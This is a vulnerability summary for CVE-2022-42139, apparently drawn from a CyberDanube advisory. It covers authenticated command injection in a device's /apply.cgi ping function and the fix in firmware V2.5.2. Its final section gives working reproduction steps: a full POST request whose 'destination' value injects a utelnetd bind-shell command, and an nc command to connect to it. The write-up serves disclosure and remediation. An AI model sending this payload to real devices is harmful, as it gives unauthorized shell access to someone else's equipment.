CVE-2022-42139

An authenticated attacker sends a crafted POST request to `/apply.cgi` with a URL query parameter that includes a valid `timestamp` value and the path `/MT_ping.htm`. The POST body contains the `destination` parameter whose value is wrapped in backticks containing arbitrary shell commands — in the PoC, `utelnetd -p 8889 -l /bin/ash -d` [ref_id=1]. The web server passes this unsanitized input to a shell, executing the injected command on the underlying operating system. The attacker can then connect to the resulting bind shell (e.g., via netcat on port 8889) to gain interactive access to the device [ref_id=1].

The vulnerable endpoint is `/apply.cgi` on the device's web server, specifically when invoked with the path `/MT_ping.htm` and a valid `timestamp` query parameter [ref_id=1]. The `destination` POST parameter is the injection point. No source code or patch files are included in the bundle.

The advisory states that the vendor released firmware version V2.5.2 as the fix [ref_id=1]. No patch diff is provided in the bundle, so the exact code change is unknown. The remediation presumably sanitizes or validates the `destination` parameter and other POST inputs before passing them to a shell, preventing command injection. CyberDanube recommends all customers upgrade to firmware version V2.5.2 [ref_id=1].

1. Obtain a valid session cookie and the correct `timestamp` value for the target device. 2. Send the following POST request (adjusting Host, Cookie, and timestamp as needed): `POST /apply.cgi?/MT_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1` with body `submit_flag=mt_ping&hid_ver1=&hid_ser1=&hid_comm1=&hid_ver2=&hid_ser2=&hid_comm2=&destination=\`utelnetd%20-p%208889%20-l%20/bin/ash%20-d\`` [ref_id=1]. 3. Connect to the bind shell on port 8889 using netcat: `nc <target-ip> 8889` [ref_id=1].